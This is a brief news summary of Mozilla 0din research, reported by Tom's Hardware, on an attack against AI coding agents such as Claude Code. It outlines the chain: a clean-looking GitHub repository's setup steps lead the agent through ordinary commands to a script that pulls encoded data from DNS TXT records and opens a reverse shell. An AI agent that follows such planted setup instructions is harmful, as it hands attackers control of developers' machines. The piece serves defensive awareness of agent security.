Mozilla 0din shows how clean-looking repos can trick coding agents into malware
Tom's Hardware reported on Mozilla 0din research showing how Claude Code-style agents can be led through a clean-looking GitHub repository into running a reverse shell via indirect setup steps and DNS TXT records.
Read more
Tom's Hardware reported on Mozilla 0din research demonstrating a supply-chain attack pattern against AI coding agents. The scenario starts with a clean-looking GitHub repository that instructs an agent such as Claude Code to initialize a Python environment. A fake Axiom setup path leads the agent through ordinary-looking commands, then a shell script retrieves encoded data from DNS TXT records and opens a reverse shell. The article says each individual step can look harmless to scanning tools, which makes agent execution discipline and sandboxing critical for developers using autonomous coding assistants.
Key details: Mozilla 0din demonstrated an indirect attack against AI coding agents, The attack uses a clean-looking repository and setup instructions, The payload is delivered via DNS TXT records before opening a reverse shell.
Why it matters: Agent security depends on what tools actually execute, and this attack shows why clean repository appearance is not enough when assistants can chain setup steps automatically.